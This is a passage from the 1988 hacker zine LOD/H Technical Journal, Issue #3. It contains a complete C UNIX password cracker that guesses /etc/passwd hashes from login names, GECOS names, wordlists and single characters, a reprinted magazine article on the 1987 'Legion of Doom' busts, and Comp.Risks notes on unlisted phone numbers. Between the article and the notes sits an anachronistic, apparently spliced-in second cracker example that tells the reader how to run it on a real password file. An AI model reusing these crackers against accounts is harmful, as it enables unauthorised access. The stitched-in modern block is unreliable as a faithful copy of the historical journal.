these signals and the trunk applies one pulse of coin collect, coin return or
ring back. The trunk does not make a test to see if the action was successful.
If a DDD call was completed to a busy number the Step By Step TSPS trunk
will apply one quick pulse of coin return toward the coin station, then the
coin box will check to see if the coin ground has disappeared. If the ground
is still present the coin box trunk will repeat the attempt to collect the
coin.


If you have any further questions about how the central office handles
coin service or about coin service in general, I can be reached via E-mail on
The Phoenix Project at 512/441-3088.

Oct 1988 - Phase Jitter....Legion of Doom/Hackers!


The LOD/H Technical Journal, Issue #3: File 09 of 11

----------------> UNIX Password Hacker: Courtesy of USENET <------------------

The following is an extensive UNIX password hacking program taken off
USENET a while back. It resembles Shooting Shark's HPW.C program in some ways,
but this program has more options. Read the REM statements to determine what
options you wish to enable. If nothing else, this program can give those who
wish to write a similar program an idea of how and what you want to put in it.


- - - - - - - - - - - - - - - - - cut here - - - - - - - - - - - - - - - - - - -


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <pwd.h>

#define index strchr
#ifndef lint
static char *rcsid = "$Header: pwchkr.c,v 1.2 85/11/30 22:42:07 richl Exp $";
#endif

/*
 * Warning: this program burns a lot of cpu.
 */
/*
 * pwchkr - find accounts with poor passwords
 *      Date: Tue, 29 Nov 83 18:19:32 pst
 *      From: leres%ucbarpa@Berkeley (Craig Leres)
 *      Modified by Seth Alford, Roger Southwick, Steve Dum, and
 *      Rick Lindsley for Tektronix
 */

/*
 * $Log: pwchkr.c,v $
 * Revision 1.2  85/11/30  22:42:07  richl
 * Added code to allow for password aging.
 *
 * Revision 1.1  85/09/10  16:00:56  root
 * Initial revision
 *
 *
 * By default, this program only checks for accounts with passwords the same
 * as the login name.  The following options add more extensive checking. (The
 * tradeoff is cpu time -- with all options enabled it can run into the 100's
 * of MINUTES.)  Any argument that does not begin with a "-" is assumed to be
 * a file name.  (A single '-' means stdin.)  If no file name is given,
 * /etc/passwd is used.
 *
 * Options:
 *
 *      -v: verbose -- list all guesses on stdout
 *      -u: output the username on the line of the password file
 *          currently being checked.  If the program stops
 *          abruptly you will then know how far it got.
 *      -w file: use the list of words contained in "file" as likely
 *          passwords.  Words in the file are one to a line.
 *      -b: check all guesses backwards too
 *      -g: use the Full Name portion of the gecos field to
 *          generate more guesses
 *      -s: check the single letters a-z, A-Z, 0-9 as passwords
 *      -c: with each guess, check for all-lowercase and
 *          all-uppercase versions too.
 *      -n: complain about null passwords (default is to keep
 *          quiet)
 */

/*
 * crypt(3) lives in libcrypt on most systems: link with -lcrypt.  The
 * prototype is spelled out here so the file builds without <crypt.h>.
 */
extern char *crypt(const char *key, const char *salt);

int verbose = 0, singles = 0, backwards = 0, checkgecos = 0, checkcase = 0,
    chknulls = 0, users = 0, chkwords = 0;

char PASSWD[] = "/etc/passwd";
static FILE *pwf = NULL, *wlf = NULL;
char line[BUFSIZ+1];
struct passwd passwd;           /* the entry currently being checked */
char *Curpw, *Wordlist = NULL;  /* file being scanned (NULL = default), word list */

/*
 * The program carries its own passwd-file reader so that files other than
 * /etc/passwd can be scanned.  The originals were named setpwent/getpwent/
 * endpwent; they are renamed here because <pwd.h> declares those names with
 * different signatures and a modern compiler rejects the clash.
 */
int openpwfile(char *file);
void closepwfile(void);
struct passwd *nextpwent(void);
char *pwskip(char *p);
char *reverse(char *str);
void chkpw(void);
int uandltry(struct passwd *pwd, char *guess);
int try(struct passwd *pwd, char *guess);

int
main(int argc, char **argv)
{
    register int i;
    register char *arg;
    int onedone = 0;

    /* first pass: consume option flags, NULLing them out of argv */
    for (i = 1; i < argc; i++)
        if ((arg = argv[i]) && *arg == '-')
            while (*++arg) {
                switch (*arg) {
                case 'n':
                    /*
                     * complain about null passwords
                     */
                    chknulls++;
                    break;
                case 'c':
                    /*
                     * check cases
                     */
                    checkcase++;
                    break;
                case 'g':
                    /*
                     * use gecos
                     */
                    checkgecos++;
                    break;
                case 'v':
                    /*
                     * turn on motormouth
                     */
                    verbose++;
                    break;
                case 'b':
                    /*
                     * check all attempts forwards and backwards
                     */
                    backwards++;
                    break;
                case 's':
                    /*
                     * carry out a more intensive search, checking for
                     * single letter passwords
                     */
                    singles++;
                    break;
                case 'u':
                    /*
                     * print out users as testing
                     */
                    users++;
                    break;
                case 'w':
                    /*
                     * consult word list of likely passwords
                     */
                    if ((Wordlist = argv[i+1]) == NULL) {
                        fprintf(stderr,
                            "%s: No file supplied with -w option\n",
                            argv[0]);
                        exit (1);
                    }
                    argv[i+1] = NULL;
                    break;
                case '\0':
                    /*
                     * read from stdin
                     */
                    break;
                default:
                    fprintf(stderr,
                        "%s: unknown option '%c'. Options are:\n", argv[0],
                        *arg);
                    /* FALL THRU */
                case '-':
                    fprintf(stderr, "-v:\t\tverbose -- list all guesses on stdout\n");
                    fprintf(stderr, "-u:\t\toutput the username currently being checked\n");
                    fprintf(stderr, "-w file:\tconsult the indicated file for words to check as passwords\n");
                    fprintf(stderr, "-b:\t\tcheck all guesses forwards and backwards\n");
                    fprintf(stderr, "-g:\t\tuse the Full name portion of the gecos field for more guesses\n");
                    fprintf(stderr, "-s:\t\tcheck the single letters a-z, A-Z, 0-9 as passwords\n");
                    fprintf(stderr, "-c:\t\tcheck the all-upper and all-lower case version of each guess\n");
                    fprintf(stderr, "-n:\t\tcomplain about null passwords\n");
                    exit(1);
                }
                argv[i] = NULL;
            }

    /* second pass: whatever survived is a password file name (or "-" for stdin) */
    for (i = 1; i < argc; i++) {
        if (argv[i] == NULL) continue;
        onedone++;
        if (*(argv[i]) == '-') {
            /*
             * read from stdin; we'll cheat and set pwf directly
             */
            pwf = stdin;
            chkpw();
            /*
             * don't fclose stdin!
             */
            clearerr(stdin);
        }
        else {
            if (openpwfile(argv[i])) {
                perror(argv[i]);
                continue;
            }
            Curpw = argv[i];
            chkpw();
            closepwfile();
        }
    }
    if (!onedone) {
        Curpw = NULL;
        chkpw();
    }
    exit(0);
}

#define ARB_CONST 30000

void
chkpw(void)
{
    register char *cp, *cp2;
    register struct passwd *pwd;
    char guess[100];
    char *wordarray[ARB_CONST];
    char **wordptr = NULL, **endptr = NULL;
    int done;

    if (Wordlist)
    {
        if ((wlf = fopen(Wordlist, "r")) == NULL)
        {
            perror(Wordlist);
            exit(1);
        }
        wordptr = wordarray;
        /*
         * note that endptr points to space OUTSIDE of wordarray
         */
        endptr = wordarray + (sizeof(wordarray)/sizeof(char *));

        /*
         * fgets replaces the original fscanf("%[^\n]\n"), which could not
         * advance past an empty line and so looped forever on one.
         */
        while (fgets(guess, sizeof(guess), wlf) != NULL)
        {
            guess[strcspn(guess, "\n")] = '\0';
            if (wordptr == endptr)
            {
                fprintf(stderr, "Ran out of wordlist space. ARB_CONST %d must be too small.\n", ARB_CONST);
                exit(1);
            }
            if ((*wordptr = malloc(1+strlen(guess))) == NULL)
            {
                fprintf(stderr, "malloc: no more memory for wordlist\n");
                exit (1);
            }
            strcpy(*wordptr, guess);
            wordptr++;
        }
        *wordptr = NULL;
    }

    while ((pwd = nextpwent()) != 0 ) {

        done = 0;   /* reset per account; the original never cleared it */

        if (verbose || users) {
            if (Curpw == NULL)
                printf("\t%s \"%s\"\n", pwd->pw_name, pwd->pw_gecos);
            else
                printf("%s -- \t%s \"%s\"\n", Curpw, pwd->pw_name,
                    pwd->pw_gecos);
            fflush(stdout);
        }
        if (*pwd->pw_passwd == '\0') {
            if (chknulls) {
                if (Curpw == NULL)
                    printf("Problem: null passwd:\t%s\tshell: %s\n",
                        pwd->pw_name, pwd->pw_shell);
                else
                    printf("%s -- Problem: null passwd:\t%s\tshell: %s\n",
                        Curpw, pwd->pw_name, pwd->pw_shell);
                fflush(stdout);
            }
            continue;
        }
        /*
         * Try the user's login name
         */
        if (uandltry(pwd, pwd->pw_name))
            continue;

        /*
         * Try names from the gecos field
         */
        if (checkgecos) {
            strncpy(guess, pwd->pw_gecos, sizeof(guess) - 1);
            guess[sizeof(guess) - 1] = '\0';
            cp = guess;
            if (*cp == '-') cp++;       /* special gecos field */
            if ((cp2 = index(cp, ';')) != NULL)
                *cp2 = '\0';

            /* each blank-separated word of the full name is a guess */
            for (;;) {
                if ((cp2 = index(cp, ' ')) == NULL) {
                    if (uandltry(pwd, cp))
                        done++;
                    break;
                }

                *cp2 = '\0';

                if (uandltry(pwd, cp)) {
                    done++;
                    break;
                }
                cp = ++cp2;
            }
        }

        if (!done && Wordlist)
        {
            /*
             * try the words in the wordlist
             */
            wordptr = wordarray;
            while (endptr != wordptr)
            {
                if (*wordptr == NULL)
                    break;
                if (uandltry(pwd, *wordptr++))
                {
                    done++;
                    break;
                }
            }
        }

        if (!done && singles) {
            /*
             * Try all single letters
             * (try digits too . --Seth)
             */
            guess[1] = '\0';
            for (guess[0]='a'; guess[0] <= 'z'; guess[0]++)
                if (try(pwd, guess))
                    break;
            for (guess[0]='A'; guess[0] <= 'Z'; guess[0]++)
                if (try(pwd, guess))
                    break;
            for (guess[0]='0'; guess[0] <= '9'; guess[0]++)
                if (try(pwd, guess))
                    break;
        }
    }
}


/*
 * Stands for "upper and lower" try.  Calls the "real" try, below,
 * with the supplied version of the password, and with
 * an upper and lowercase version of the password.  If the user doesn't
 * want to try upper and lower case then we just return after the one
 * check.
 */

int
uandltry(struct passwd *pwd, char *guess)
{
    register char *cp;
    char buf[100];
    int alllower, allupper;

    alllower = allupper = 1;

    if (try(pwd, guess) || (backwards && try(pwd, reverse(guess)))) return (1);

    if (!checkcase) return(0);

    strncpy(buf, guess, sizeof(buf) - 1);
    buf[sizeof(buf) - 1] = '\0';
    for (cp = buf; *cp; cp++) {
        if (isupper((unsigned char)*cp))
            alllower = 0;
        if (islower((unsigned char)*cp))
            allupper = 0;
    }

    if (!allupper) {
        for (cp = buf; *cp != '\0'; cp++)
            if (islower((unsigned char)*cp))
                *cp += 'A' - 'a';
        if (try(pwd, buf) || (backwards && try(pwd, reverse(buf)))) return (1);
    }

    if (!alllower) {
        for (cp = buf; *cp != '\0'; cp++)
            if (isupper((unsigned char)*cp))
                *cp += 'a' - 'A';
        if (try(pwd, buf) || (backwards && try(pwd, reverse(buf)))) return (1);
    }
    return (0);
}

int
try(struct passwd *pwd, char *guess)
{
    register char *cp;

    if (! guess || ! *guess) return(0);
    if (verbose) {
        if (Curpw == NULL)
            printf("Trying \"%s\" on %s\n", guess, pwd->pw_name);
        else
            printf("%s -- Trying \"%s\" on %s\n", Curpw, guess,
                pwd->pw_name);
        fflush(stdout);
    }
    /*
     * crypt() returns NULL for an unusable salt (e.g. an "x" or "*"
     * placeholder in a shadowed passwd file); treat that as "no match".
     */
    cp = crypt(guess, pwd->pw_passwd);
    if (cp == NULL || strcmp(cp, pwd->pw_passwd))
        return (0);
    if (Curpw == NULL)
        printf("Problem: Guessed:\t%s\tshell: %s passwd: %s\n",
            pwd->pw_name, pwd->pw_shell, guess);
    else
        printf("%s -- Problem: Guessed:\t%s\tshell: %s passwd: %s\n",
            Curpw, pwd->pw_name, pwd->pw_shell, guess);
    fflush(stdout);
    return (1);
}
/* end of PW guessing program */

#define MAXUID 0x7fff   /* added by tonyb 12/29/83 */
                        /* altered to a reasonable number - mae 8/20/84 */

/*
 * Add a parameter to "setpwent" so I can override the file name.
 */

int
openpwfile(char *file)
{
    if ((pwf = fopen(file, "r")) == NULL)
        return(1);
    return(0);
}

void
closepwfile(void)
{
    fclose(pwf);
    pwf = NULL;
}

/*
 * Terminate the field at p (on ':' or newline) and return a pointer to
 * the start of the next field.
 */
char *
pwskip(char *p)
{
    while (*p && *p != ':' && *p != '\n')
        ++p;
    if (*p == '\n')
        *p = '\0';
    else if (*p)
        *p++ = '\0';
    return(p);
}

struct passwd *
nextpwent(void)
{
    register char *p;
    long x;

    if (pwf == NULL)
        if (openpwfile(PASSWD)) {
            perror(PASSWD);
            return(NULL);
        }
    p = fgets(line, BUFSIZ, pwf);
    if (p == NULL)
        return(0);
    passwd.pw_name = p;
    p = pwskip(p);
    passwd.pw_passwd = p;
    p = pwskip(p);
    x = atol(p);
    passwd.pw_uid = (x < 0 || x > MAXUID) ? (MAXUID+1) : x;
    p = pwskip(p);
    x = atol(p);
    passwd.pw_gid = (x < 0 || x > MAXUID) ? (MAXUID+1) : x;
    /* the original cleared pw_comment here; modern struct passwd has no such field */
    p = pwskip(p);
    passwd.pw_gecos = p;
    p = pwskip(p);
    passwd.pw_dir = p;
    p = pwskip(p);
    passwd.pw_shell = p;
    (void) pwskip(p);

    p = passwd.pw_passwd;
/*  while(*p && *p != ',')
        p++;
    if(*p)
        *p++ = '\0';
    passwd.pw_age = p;
*/
    return(&passwd);
}



/*
 * reverse a string
 */
char *
reverse(char *str)
{
    register char *ptr;
    register int len;

    if ((ptr = malloc((len = strlen(str))+1)) == NULL)
        return(NULL);
    ptr += len;
    *ptr = '\0';
    while (*str && (*--ptr = *str++))
        ;
    return(ptr);
}


- - - - - - - - - - - - - - - - - cut here - - - - - - - - - - - - - - - - - - -

The LOD/H Technical Journal, Issue #3: File 10 of 11

----------------> Clearing up the Mythical LOD/H Busts <------------------


Following is an article taken from Pirate-80 that Scan Man typed up which
talks about the summer busts of 87. They called it the "LOD" case but, as
usual, they were disillusioned. Our guess is that Oryan Quest was one of the
first to be investigated and, by calling other hackers while a DNR was on his
line, led the authorities to the others who were eventually visited. Oryan
claimed he was in LOD and this is where they must have gotten the idea that
everyone he spoke to was in LOD also. In this respect the article is rather
humorous in that they caught people who were not in LOD/H. Normally we would
not put reprints of magazine articles in the LOD/H Technical Journal, but
seeing how it is relevant in clearing up any misconceptions, we decided to
put it in.

------------------------------------------------------------------------------
Remember, Oryan Quest is *NOT* now, *NEVER* has, and *NEVER* will be in LOD/H!
------------------------------------------------------------------------------

From: SCAN MAN
To: ALL
Subj: LEGION OF DOOM BUST


WAR AGAINST PHONE HACKING HEATS UP
BY GREGG PEARLMAN, ANTIC ASSISTANT EDITOR

Computer break-ins are no longer viewed as harmless pranks. For example,
unauthorized computer access is a misdemeanor under 502PC of the California
Penal Code if you just trespass and browse around -- and if it's your first
offense.

But: "Any person who maliciously accesses, alters, deletes, damages, destroys
or disrupts the operation of any computer system, computer network, computer
program or data is guilty of public offense" -- a felony under Section C of
that code. Even changing a password to "Gotcha" is a felony if it can be
proven that it was a "malicious access."

In California, the maximum punishment is state imprisonment, a $10,000 fine and
having your equipment confiscated. The penalty depends on who you are, your
prior record and the seriousness of the crime.

And you don't have to, for instance, breach national security to be guilty of a
felony. Accessing even a simple system of a small company could damage vital
data for more than a year's worth of business, especially if that company
didn't properly back up its data.

There are all kinds of computer crime. Stealing an automated teller machine
card and withdrawing money from an account is a computer crime because you're
using a computer to get money out of a system. But simply trespassing in a
system and not doing any damage is normally a misdemeanor, according to Sgt.
John McMullen of the Stanford University Police Services. This kind of crime
has become very common. "Every kid with a computer is tempted," he said.

Unfortunately, it can take months to complete an investigation. For instance,
the so-called "LEGION OF DOOM" case, beginning in September, 1986, took 10
months to solve and involved people in Maryland, New York, Pennsylvania, Oregon
and California.

If someone breaks into the computers of, for example, California's Pacific
Bell, and the break-in is severe, Pacific Bell Security gets warrants issued,
and then, with the police, confiscates computers, manuals, telephone lists and
directories -- all related equipment. It's common for the computer to be tied
up for a few months as evidence. (And by the time Pacific Bell Security does
get involved, the evidence is usually overwhelming -- the conviction rate is
extremely high.)

"Whenever I'm involved in a case," said McMullen, "I ask the judge for
permission to confiscate the equipment. That's one big incentive for hackers
not to do this kind of stuff. I haven't had any repeaters, but I know of one
case where the guy probably WILL do it again when he gets out.

"Usually the shock of what happens to a juvenile's parents -- who bought the
equipment and watched it get confiscated -- is enough to make them stop. But we
don't really have enough cases to know what the parents do."


ACCESS

"It's easy for hackers to find company phone numbers," said Daniel Suthers,
Atari user and operations manager at Pacific Bell in Concord, California.
"Most large companies have a block of 500 to 1,000 phone numbers set aside for
their own use. At least one line will have a modem.

"People post messages on hacker/phreaker bases on some BBS's and say 'I don't
know who this phone number belongs to, but it's a business, judging by the
prefix, and has a 1200-baud tone.' Then it's open season for the hackers and
phreakers."

Phreakers aren't much different than hackers -- they're just specifically
telephone-oriented. In "CompuTalk: Texas-Sized BBS" (Antic, August 1987),
sysop Kris Meier discussed phreakers who appear to have called from phone
numbers other than the ones they were actually using. A computer isn't needed
to do this -- it's usually done with a "blue box."

"The blue boxes were used mostly in the late 1960s and early '70s," said
McMullen. "They fool the network and let people make free long distance calls
-- a tone generator simulates the signalling codes used by long distance
operators. The boxes were phased out a couple of years ago, though: they no
longer let hackers access AT&T, but Sprint and MCI can be accessed by something
similar. However, computer programs are normally used now."

To get long-distance phone service, hackers now use one of several programs
passed among other hackers (on bulletin boards, for example). They find the
local access number for Sprint or MCI and then run the program -- perhaps for a
few days. It generates and dials new phone numbers, and the hackers can check
to see how many new or free codes they've turned up.

They can post the codes on a BBS, and their friends will use them until they
get stopped by the long-distance company -- depending on how long it takes the
company to realize that these numbers hadn't been issued yet -- or until the
customers discover that their numbers have been accessed by someone who isn't
"authorized."

Bulletin boards can be especially easy prey. "If a hacker knew your BBS
program intimately, he could probably figure it out, but that's messy," said
Suthers. "If he can find a back door, it's easier. Sysops are notorious for
putting in their own back doors because, though they have all the security
under the sun on the FRONT doors, they still want to get in without problems.
It's just like what happened in the films Tron and Wargames -- which probably
taught a whole generation a lot of things."

Meier had said in the August, 1987 issue of Antic that someone once called his
board COLLECT. Simply put, the caller fooled the operator. McMullen says
that's been around for a long time. "It's common in prisons and situations
where the phones are restricted." McMullen also said that if the timing is just
right, as soon as the modem answers, the phreaker can wait for an operator to
say "Will you accept the charges," then say "Yes." The operator can't tell
which end said yes, and if the modem has a long delay before the connect tone,
the phreaker can get away with it. It couldn't be done entirely electronically
-- the voice contact is needed.

"I've never run across people accessing online services such as CompuServe in
this way, but I'm sure it happens," said McMullen. "People suddenly get
strange charges on their phone bills. The hackers I've dealt with are very
brilliant and good at what they do. Of course, when you do something all day
that you're really interested in, you're GOING to be good at it."


DOOM

McMullen's most recent hacker case at Stanford University dealt with the Legion
of Doom, an elite group of hackers who broke into computers -- some containing
national defense-related items. "As I understand it, they're supposed to be the
top hackers in the nation," McMullen said. "I started investigating the case
when it began crossing state lines, getting a bit too big. I contacted the
FBI, who said that because of the Secret Service's jurisdiction over credit
card and telephone access fraud, they'd taken over computer crime
investigations that go across state lines -- actually, anything involving a
telephone access code. This case, of course, involved access codes, because
the Sprint and AT&T systems were used, and it was the Secret Service, not the
FBI, that made the arrests. "I think that the publicity from this case will
scare people, and there'll be a lot less hacking for a while. Some hackers are
afraid to do anything: they're afraid that the Secret Service is watching them,
too."


TRACING

AT&T, Sprint and MCI now have ANI -- Automatic Number Identification -- as does
Pacific Bell. It aids a great deal in detecting hackers. Pacific Bell usually
just assists in this type of investigation and identifies the hackers. "It's
easy to trace a call if the caller logs in more than once," said Suthers. "The
moment they dial in, a message is printed out -- before the phone even answers
-- pinpointing where it came from, where it went to, the whole shmeer.

"A blue box made it much harder to detect, but if a hacker used it
consistently, we could eventually trace it back. So if someone is in
California and makes it look as if he'd called from New York, we can trace it
across the country one way, and then back across. Generally, though, if the
call IS billed to a New York number, the caller is actually somewhere like
Florida. But we can back-trace the call itself, especially if it's extremely
long."

But recently someone broke into Pacific Bell "through a fluke of
circumstances." Suthers said, "We closed down that whole area, so they can't
get back in that way, but if they dial the number again, they're in trouble."
If Pacific Bell Security detects a break-in, the area is secured immediately.
Sometimes hackers are steered toward a kind of "pseudo-system" that makes them
THINK they've broken in -- but in fact they're being monitored and traced.
As to how many hackers there are, who knows? There's a lot of misuse and
inside work that's never detected or reported.


SECURITY

Security systems are expensive, but someone with a lot of data and an important
system should seriously look into one. Very few hackers are caught, simply
because few corporations have good security systems. "Passwords should never be
names, places or anything that can be found in a dictionary," said Suthers.
"People shouldn't be able to just write a program to send words from their
AtariWriter Plus dictionary disk. Normally there should be a letter here, a
few numbers there -- garbage. Thus, if someone writes a program to generate
random symbols and keeps calling back until he breaks in, he'll probably be
traced. "Some corporations aren't very computer literate and don't worry about
things like passwords until they've been hit, which is a shame. But it's all
out there in the books. TRICKS OF THE UNIX MASTER (by Russell Sage, published
by SAMS Publications, $22.95) is a beautiful book that tells you exactly what
to do to avoid break-ins."

McMullen said that Stanford is trying to tighten up security by emphasizing the
importance of better passwords. "When researchers want to do their work,
however, they don't want to mess with passwords and codes," he said.
"Universities seem to want to make their systems easier for researchers to use.
The more accessible it is, obviously, the less security there is in terms of
passwords. It's easier to use your name as a password than some complicated
character string. "So any hacker worth his salt can go onto any computer system
and pull out an account. Especially with UNIX, it's very easy to access it,
entering as the password the first name of the person who has the account.
These Legion of Doom hackers used a program that actually found out what the
passwords were: it began by just checking the names. They were very successful
-- it was just unbelievable."

But McMullen feels that security fell way behind the advances made in
computers, and several avenues were left open for people to explore. "Often
these hackers don't mean to be malicious or destructive," he said, "but I think
they really feel triumphant at getting on. Sometimes they do damage without
realizing it, just by tramping through the system: shutting down phone lines,
programs and accounting systems." However, the strides made in security since
then have accounted for arrests, confiscations and convictions all over the
country -- but there are still many more to come.
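McMullen describes the cracker as starting from the account holder's own name, and the reverse() routine in the cracker listing earlier in this issue is one of the transformations such a program applies. The following is an added example, written for this edition and not taken from the Antic article or from the cracker's own source, showing the name-derived guessing loop over /etc/passwd-style records: login, login reversed, the first name from the GECOS field, and login plus a digit. It assumes a stand-in hash (FNV-1a rendered as hex) in place of crypt(3) so that it builds without libcrypt; the passwd line it cracks is constructed for the demonstration, as are the names hash_guess, name_guesses, crack_record, crack_line and demo.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAXG 16   /* guesses tried per account */
#define GLEN 64   /* longest guess kept */

/* Stand-in for crypt(3): FNV-1a over the guess as 16 hex digits (an assumption
   so the example builds without libcrypt).  A real cracker calls
   crypt(guess, pw_passwd) and compares the result with pw_passwd. */
void hash_guess(const char *s, char out[17])
{
    uint64_t h = 1469598103934665603ULL;
    for (; *s; s++) { h ^= (unsigned char)*s; h *= 1099511628211ULL; }
    snprintf(out, 17, "%016llx", (unsigned long long)h);
}

/* Same trick as reverse() above, into a caller-supplied buffer. */
static void reverse_into(const char *s, char *dst, size_t dstsz)
{
    size_t len = strlen(s), i;
    if (len > dstsz - 1) len = dstsz - 1;
    for (i = 0; i < len; i++) dst[i] = s[len - 1 - i];
    dst[len] = '\0';
}

/* Guesses a name-based cracker derives from one passwd record: the login,
   the login reversed, the first word of GECOS (as typed and lower-cased),
   then login plus one digit.  Duplicates of the login are skipped.
   Returns the number of guesses written. */
int name_guesses(const char *login, const char *gecos, char out[][GLEN], int max)
{
    int n = 0, d; size_t i;
    if (n < max) snprintf(out[n++], GLEN, "%s", login);
    if (n < max) reverse_into(login, out[n++], GLEN);
    if (gecos && *gecos) {
        char first[GLEN], lower[GLEN];
        for (i = 0; gecos[i] && gecos[i] != ' ' && gecos[i] != ',' && i + 1 < GLEN; i++)
            first[i] = gecos[i];
        first[i] = '\0';
        for (i = 0; first[i]; i++) lower[i] = (char)tolower((unsigned char)first[i]);
        lower[i] = '\0';
        if (n < max && strcmp(first, login) != 0) snprintf(out[n++], GLEN, "%s", first);
        if (n < max && strcmp(lower, first) != 0 && strcmp(lower, login) != 0)
            snprintf(out[n++], GLEN, "%s", lower);
    }
    for (d = 0; d < 10 && n < max; d++) snprintf(out[n++], GLEN, "%s%d", login, d);
    return n;
}

/* Try the derived guesses against one stored hash.  Returns the 1-based index
   of the matching guess (copied to found when non-NULL), or 0 for no match. */
int crack_record(const char *login, const char *stored, const char *gecos,
                 char *found, size_t foundsz)
{
    char g[MAXG][GLEN], h[17]; int i, n = name_guesses(login, gecos, g, MAXG);
    for (i = 0; i < n; i++) {
        hash_guess(g[i], h);
        if (strcmp(h, stored) == 0) {
            if (found) snprintf(found, foundsz, "%s", g[i]);
            return i + 1;
        }
    }
    return 0;
}

/* Split a passwd line (login:passwd:uid:gid:gecos:dir:shell), keeping empty
   fields, and crack it.  Returns 0 for lines with fewer than five fields. */
int crack_line(const char *line, char *found, size_t foundsz)
{
    int i; char buf[256], *f[7], *p = buf, *c;
    snprintf(buf, sizeof buf, "%s", line);
    buf[strcspn(buf, "\n")] = '\0';
    for (i = 0; i < 7; i++) {
        f[i] = p;
        if ((c = strchr(p, ':')) == NULL) { i++; break; }
        *c = '\0';
        p = c + 1;
    }
    if (i < 5) return 0;
    return crack_record(f[0], f[1], f[4], found, foundsz);
}

/* Constructed sample: an account whose password is the login spelled backwards.
   Returns 1 when the cracker finds it as guess #2 ("yram"). */
int demo(void)
{
    char stored[17], line[256], found[GLEN];
    hash_guess("yram", stored);
    snprintf(line, sizeof line, "mary:%s:201:20:Mary Smith:/usr/mary:/bin/sh", stored);
    return crack_line(line, found, sizeof found) == 2 && strcmp(found, "yram") == 0;
}

int main(void)
{
    printf("%s\n", demo() ? "mary: cracked (login reversed)" : "mary: not cracked");
    return 0;
}
```

To turn this into an audit of a real password file, replace hash_guess with a call to crypt(3) using the stored field as the salt and feed each line of the file to crack_line; the guess list is the part that matters, and the fourteen candidates per account here are why "name as password" accounts fell so quickly.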
The LOD/H Technical Journal, Issue #3: File 11 of 11

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$                                                                            $
$                            Network News & Notes                            $
$                                                                            $
$                      Compiled from Comp.Risks Digest                       $
$                                     by                                     $
$                                 The Mentor                                 $
$                                                                            $
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Comp.Risks Digest is a USENET distributed newsletter on risks to the
public from computer-related systems. It is frequently one of the first
places that bugs in operating systems show up. These are some of the more
interesting posts that have appeared in the past month.

----------------------------------------------------------------------------

Date: Wed, 5 Oct 88 12:35:37 EDT
From: Dave Wortman <dw@csri.toronto.edu>
Subject: Emergency Access to Unlisted Telephone Numbers

The article below was originally posted to misc.consumers. I thought it might
be of interest to RISKS readers as an example of a well-thought-out set of
administrative procedures designed to balance the needs of protection of
privacy and response to emergency situations.

=======================================================================

All examples in this message pertain to Illinois Bell Telephone Company, which
covers the Chicago metropolitan area, and quite a bit of the rest of Illinois.

There are three types of phone numbers which do not appear in the printed and
publicly available directory: (1) Too new to list (2) Non-listed (3) Non-pub.
[discussion of types (1) and (2) deleted.]

The third category of numbers not in the phone book or available from the
Directory Assistance Bureau are non-published numbers. Non-pub numbers are NOT
available at the Directory Assistance level. Inquiries about same which are
input into a DA terminal simply come up with a message that 'at the customer's
request, the number is not listed in our records; the number is non-published.'

Well, who does keep non-pub records then? The Business Office has no handy way
to retrieve them, since they depend on an actual phone number when they pull up
a record to discuss an account. Once a service order is processed, the number
and associated name are no longer available to the average worker in the
central office.

There was for several years a small group known as the 'NonPub Number Bureau'
which at the time was located in Hinsdale, IL. Needless to say, the phone
number to the NonPub Number Bureau was itself non-published, and was only
available to specified employees at Bell who were deemed to have a 'need to
know'. Now I think with all the records being highly computerized, the keepers
of the non-pub phone numbers are themselves scattered around from one phone
office to another.

When there is some specific need for an employee at the phone company to
acquire the non-published number of a subscriber, then certain security
precautions kick into place. Only a tiny percentage of telephone company
employees are deemed to have a 'need to know' in the first place; among
these would be the GCO's (Group Chief Operators), certain management people
in the central offices, certain people in the Treasury/Accounting office,
and of course, security representatives both from Illinois Bell and the
various long distance carriers, such as AT&T/Sprint/MCI.

Let us have a hypothetical example for our Correspondent: Your mother has taken
seriously ill, and is on her deathbed. Your brother is unable to reach you to
notify you of this because you have a non-pub number. When his request for the
number has been turned down by Directory Assistance, simply because they do not
have it, he asks to speak with a supervisor, and he explains the problem. He
provides his own name and telephone number, and the supervisor states he will
be called back at a later time. The supervisor does not question if in fact an
emergency exists, which is the only valid reason for breaking security. The
supervisor may, if they are doing their job correctly, ask the inquirer point
blank, "Are you stating there is an emergency situation?".

Please bear in mind that the law in Illinois and in many other states says that
a person who claims that an emergency exists in order to influence the use (or
discontinuance of use) of the telephone, when in fact there is no emergency, is
guilty of a misdemeanor crime. You say yes this is an emergency and I need to
contact my brother/sister/etc right away. The supervisor will then talk to
his/her supervisor, who is generally of the rank of Chief Operator for that
particular facility.

The Chief Operator will call the NonPub people, will identify herself, and
*leave her own call back number*. The NonPub people will call back to verify
the origin of the call, and only then will there be information given out
regarding your brother's telephone number. It helps if you know the *exact* way
the name appears in the records, and the *exact* address; if there is more than
one of that name with non-pub service, they may tell you they are unable to
figure out who it is you want.

The NonPub person will then call the subscriber with the non-published number
and explain to them what has occurred: So and so has contacted one of our
operators and asked for assistance in reaching you. The party states that it
is a family emergency which requires your immediate attention. Would it be
alright if we give him/her your number, *or would you prefer to call them back
yourself?*

Based on the answer given, the number is either relayed back to the Chief
Operator, or a message is relayed back saying the non-pub customer has been
notified. If the customer says it is okay to pass his number, then the Chief
Operator will call you back, ask who YOU are, rather than saying WHO she wants,
and satisfied with your identification will give you the number you are seeking
or will advise you that your brother has been given the message by someone from
our office, and has said he will contact you.

Before the NonPub people will even talk to you, your 'call back number' has to
be on their list of approved numbers for that purpose. A clerk in the Business
Office cannot imitate a Chief Operator for example, simply because NonPub would
say that the number you are asking us to call back to is not on our list. "Tell
your supervisor what it is you are seeking and have them call us..."

Other emergency type requests for non-pub numbers would be a big fire at some
business place in the middle of the night, and the owners of the company must
be notified at their home; or a child is found wandering by the police and
the child is too young to know his parent's (non-pub) number.

They will also handle non-emergency requests, but only if they are of some
importance and not frivolous in nature. You have just come to our city to visit
and are seeking a long lost friend who has a non-pub number; you are compiling
the invitations to your high school class fiftieth re-union and find a class
member is non-pub. Within certain reasonable limits, they will pass along your
request to the desired party and let them make the choice of whether to return
the call or not. But always, you leave your phone number with them, and in due
time someone will call you back to report what has been said or done.

